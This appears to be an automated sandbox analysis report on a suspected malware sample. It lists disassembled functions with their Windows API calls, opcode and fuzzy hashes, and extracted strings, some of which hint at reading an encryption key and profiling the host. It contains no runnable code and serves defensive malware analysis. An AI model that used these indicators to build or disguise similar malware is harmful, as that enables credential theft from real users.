                                                                                                                                                                                                • Opcode ID: 2cb9c604ba561f0e91f6ed6e537297a4bc819735b100087220e59304efea6d8c
                                                                                                                                                                                                • Instruction ID: 9b908812d3e21f809829f06eda9128a7faa6feceac2e3916093c993f17c622f9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cb9c604ba561f0e91f6ed6e537297a4bc819735b100087220e59304efea6d8c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BF11875E006068FCB15CFA9C4806AEBBF1FF58310F64856EE89AE3750D734A981CB54
                                                                                                                                                                                                Function 00166930 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 35a99ddb84e099ae0a6607a91bfdc36c762ef67c046712ac124d7e6b556b889d
                                                                                                                                                                                                • Instruction ID: 51377091e7176c853ca331b2e458d5ac35327798c320d0676b02a465824801fa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 35a99ddb84e099ae0a6607a91bfdc36c762ef67c046712ac124d7e6b556b889d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 32516D72D00219EFDF05CF99CC41AEEBBB2FF88314F198459E915AB201D735AA50CB90
                                                                                                                                                                                                Function 0014469F Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1ea3d2115689472d574504233d5e479e60840e41d715be4192dfc74f350eec6e
                                                                                                                                                                                                • Instruction ID: ee83307178c90f9d00305cea69383c9e668394e6b3334fabae9162b996500b35
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ea3d2115689472d574504233d5e479e60840e41d715be4192dfc74f350eec6e
                                                                                                                                                                                                • Instruction Fuzzy Hash: F741C621219BC49FD739DE6C485109ABFE1DFB71017488A9DE4C797B43C310EA09C7A6
                                                                                                                                                                                                Function 00144539 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f56874ec80299a65c106a4b56e3c8b83f00e55cf319624107219137b7508230b
                                                                                                                                                                                                • Instruction ID: 5bbd262357bf4f0b45c86a1134383d6add417f0defdfabff8a8b311b850411da
                                                                                                                                                                                                • Opcode Fuzzy Hash: f56874ec80299a65c106a4b56e3c8b83f00e55cf319624107219137b7508230b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A31252231ABC58FD719CA9D5C40546FFA1AEB210034DCA9DD4DD9BB03C564E909C7B2
                                                                                                                                                                                                Function 00160C70 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                • Instruction ID: 7fd3fed2ae4cd16655d5c48b2de34c569c4a0f41ab493bace154078dadd1d9d6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E11277724118243D60ACABDCCB46BBA795EBCD321B2D43FAD0434B758D322A975E600
                                                                                                                                                                                                Function 00141424 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f82fe5d51db342b635111ab47d67ed5d0cc256ef5c4054a715060750987e09ef
                                                                                                                                                                                                • Instruction ID: 8e3631a9919094d238eb7c47bd26fab6a5632f23f12f9b3358897c05a3c6193f
                                                                                                                                                                                                • Opcode Fuzzy Hash: f82fe5d51db342b635111ab47d67ed5d0cc256ef5c4054a715060750987e09ef
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9501A732D240710AA70C4A3A9C21432BBE4975731234B03ABF987EA0D1CA29D5A1D7E4
                                                                                                                                                                                                Function 00153820 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b1ad7b8e6dd2d3a30a1b537087b143b080f705283c280b151f3205acabd5c428
                                                                                                                                                                                                • Instruction ID: dd0801b8e2eec26d14fe6df224d4588831293bd56352e6c93cf2d5bcf62df5cc
                                                                                                                                                                                                • Opcode Fuzzy Hash: b1ad7b8e6dd2d3a30a1b537087b143b080f705283c280b151f3205acabd5c428
                                                                                                                                                                                                • Instruction Fuzzy Hash: 45F012725010296B9F19DFA4CC16CBF77A6EF58350B01812DFC1A5B150C731EC6197E4
                                                                                                                                                                                                Function 00155040 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 442sleepCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0015504A
                                                                                                                                                                                                  • Part of subcall function 0014B3E8: __EH_prolog3.LIBCMT ref: 0014B3EF
                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,x86,00000000), ref: 00155155
                                                                                                                                                                                                  • Part of subcall function 0014B64E: __EH_prolog3.LIBCMT ref: 0014B655
                                                                                                                                                                                                  • Part of subcall function 0014B07F: __EH_prolog3_GS.LIBCMT ref: 0014B086
                                                                                                                                                                                                  • Part of subcall function 00154DC7: __EH_prolog3_GS.LIBCMT ref: 00154DD1
                                                                                                                                                                                                  • Part of subcall function 00156920: __EH_prolog3_GS.LIBCMT ref: 00156927
                                                                                                                                                                                                  • Part of subcall function 001547EA: __EH_prolog3_GS.LIBCMT ref: 001547F4
                                                                                                                                                                                                  • Part of subcall function 001513E5: __EH_prolog3.LIBCMT ref: 001513EC
                                                                                                                                                                                                  • Part of subcall function 00154CF6: __EH_prolog3_GS.LIBCMT ref: 00154CFD
                                                                                                                                                                                                  • Part of subcall function 001568CD: __EH_prolog3.LIBCMT ref: 001568D4
                                                                                                                                                                                                  • Part of subcall function 00154FCB: __EH_prolog3_GS.LIBCMT ref: 00154FD2
                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 001555F3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_$H_prolog3$InfoNativeSleepSystem
                                                                                                                                                                                                • String ID: !$.txt$/Up$1735725939$789593363246702628$MyApp/1.0$x64$x86
                                                                                                                                                                                                • API String ID: 782859002-3287460392
                                                                                                                                                                                                • Opcode ID: a825e88373deec475dea8d05a9ea103efa290139d88dd65939d5aa61b2ff93cc
                                                                                                                                                                                                • Instruction ID: d014ff5319f208823a766c8df616ae5147ae495557205d0345f6bd1c8b0a4ace
                                                                                                                                                                                                • Opcode Fuzzy Hash: a825e88373deec475dea8d05a9ea103efa290139d88dd65939d5aa61b2ff93cc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F029130D04248EBDF15EBB4C95ABECBBB5AF25300F5440E9E4056B192EB745F88DB62
                                                                                                                                                                                                Function 00146B3E Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 202memorystringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00146B48
                                                                                                                                                                                                  • Part of subcall function 0015AE24: __EH_prolog3_GS.LIBCMT ref: 0015AE2E
                                                                                                                                                                                                  • Part of subcall function 0014B558: __EH_prolog3.LIBCMT ref: 0014B562
                                                                                                                                                                                                  • Part of subcall function 0014B558: _Func_class.LIBCONCRT ref: 0014B607
                                                                                                                                                                                                  • Part of subcall function 0014B3E8: __EH_prolog3.LIBCMT ref: 0014B3EF
                                                                                                                                                                                                  • Part of subcall function 0014A42C: __EH_prolog3.LIBCMT ref: 0014A433
                                                                                                                                                                                                  • Part of subcall function 0014B41D: __EH_prolog3.LIBCMT ref: 0014B424
                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?), ref: 00146C2D
                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00146C6A
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 00146C74
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00146CFA
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00146D01
                                                                                                                                                                                                  • Part of subcall function 0014B51E: __EH_prolog3.LIBCMT ref: 0014B525
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3$Heap$H_prolog3_Process$AllocFreeFunc_classlstrlen
                                                                                                                                                                                                • String ID: \key$en_k$os_c
                                                                                                                                                                                                • API String ID: 3880169058-3393669898
                                                                                                                                                                                                • Opcode ID: 9e3df7a1df1893fc7ef59370f337ac94c2abc8b08014e56483b74c86b5f0f0a7
                                                                                                                                                                                                • Instruction ID: 94001cb7e1f3714e0bb11a3225d26ef478930cbb808be37534184490f1e8115c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e3df7a1df1893fc7ef59370f337ac94c2abc8b08014e56483b74c86b5f0f0a7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6671AE70D00248EFCF04EBA4CD89FDEBBB5AF65700F544158F505AB1A2DB705A49CBA2
                                                                                                                                                                                                Function 0015AE24 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0015AE2E
                                                                                                                                                                                                  • Part of subcall function 0015ABF2: __EH_prolog3_GS.LIBCMT ref: 0015ABF9
                                                                                                                                                                                                  • Part of subcall function 0015ABF2: ctype.LIBCPMT ref: 0015ACB5
                                                                                                                                                                                                  • Part of subcall function 0014B7BF: __EH_prolog3.LIBCMT ref: 0014B7C6
                                                                                                                                                                                                  • Part of subcall function 0015C2B7: __EH_prolog3_GS.LIBCMT ref: 0015C2C1
                                                                                                                                                                                                  • Part of subcall function 0015C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0015C0F7
                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0015AF79
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,?), ref: 0015AF82
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_$Heap$AllocH_prolog3H_prolog3_catch_Processctype
                                                                                                                                                                                                • String ID: 17211235534172093521$18081020163143810973$8780785037186610294$@$Kernel32.dll$ntdll.dll
                                                                                                                                                                                                • API String ID: 614703607-287778538
                                                                                                                                                                                                • Opcode ID: 4efc008c914f5768d20726c3ed0c5da183daef60985afa9bd89991564b7da609
                                                                                                                                                                                                • Instruction ID: f52b8b56d5f60b54316e3fc67eefa342eed91d5b2354abea9959a2ab7184b030
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4efc008c914f5768d20726c3ed0c5da183daef60985afa9bd89991564b7da609
                                                                                                                                                                                                • Instruction Fuzzy Hash: 035149B1D00349EFDF01EFA8C885ADEBBB8AF18344F54416AE404BB291DB705E45CBA1
                                                                                                                                                                                                Function 0015F7D0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0015F7D6
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0015F7E4
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0015F7F5
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0015F806
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                • API String ID: 667068680-1247241052
                                                                                                                                                                                                • Opcode ID: 9aec8df63765eeaa07cb1de423ac031f11912b98198fb7314bd3126821a49ba9
                                                                                                                                                                                                • Instruction ID: df80023b351bc8fa284672c7ff9a841ce05e90350600821e44fb0a58b42e2645
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9aec8df63765eeaa07cb1de423ac031f11912b98198fb7314bd3126821a49ba9
                                                                                                                                                                                                • Instruction Fuzzy Hash: DAE0EC71949310AFC7007FB0BC0E8867EB8EF0A7513114026F505D3AA4D77586C8CF9A
                                                                                                                                                                                                Function 00162738 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 00162857
                                                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 00162965
                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00162AB7
                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 00162AD2
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                • API String ID: 2751267872-393685449
                                                                                                                                                                                                • Opcode ID: 119aaa9a4b3e2755dc33fbc4625ca57671a101ba96d8ff4965f7ab16a771a6db
                                                                                                                                                                                                • Instruction ID: f2722fdfb43ce8dce5824bc69db4a4ce17d82af4053a80ab89c548cb7f0856e3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 119aaa9a4b3e2755dc33fbc4625ca57671a101ba96d8ff4965f7ab16a771a6db
                                                                                                                                                                                                • Instruction Fuzzy Hash: 18B19A71800A19EFCF29DFA4CC819AEBBB5FF28311F14455AE8116B252D374DA71CB91
                                                                                                                                                                                                Function 00173DB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 0-3907804496
                                                                                                                                                                                                • Opcode ID: 221d12493d68f2aeb881d70dd8c3400ee18e512f2588b415a1715da4673892d8
                                                                                                                                                                                                • Instruction ID: 45ac7bdd4a1b01b8faf885625c0feb7af32c451be129b8a9780d0e75f73be166
                                                                                                                                                                                                • Opcode Fuzzy Hash: 221d12493d68f2aeb881d70dd8c3400ee18e512f2588b415a1715da4673892d8
                                                                                                                                                                                                • Instruction Fuzzy Hash: FBB13570E04249AFDB15DFA8CC81BAD7BB1BF59300F148159F959AB382C7709E81DBA1
                                                                                                                                                                                                Function 0017E8B8 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 127012223-0
                                                                                                                                                                                                • Opcode ID: 4ae7489488a2c6b3d259e85c4f1fbd78ff447e4b4c1353ffdcbb2ed4b4aeb901
                                                                                                                                                                                                • Instruction ID: 78bcedd1a0fe6c0e3a0f8a96252a57a4056dc118ee51318f061618735e33cc91
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ae7489488a2c6b3d259e85c4f1fbd78ff447e4b4c1353ffdcbb2ed4b4aeb901
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9371D472900209ABDF219E548C52FAFBBF99F4D314F298499EA1DA7281E735DC40C7A1
                                                                                                                                                                                                Function 0015F996 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0015F9DF
                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0015FA0B
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0015FA4A
                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0015FA67
                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0015FAA6
                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0015FAC3
                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0015FB05
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0015FB28
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2040435927-0
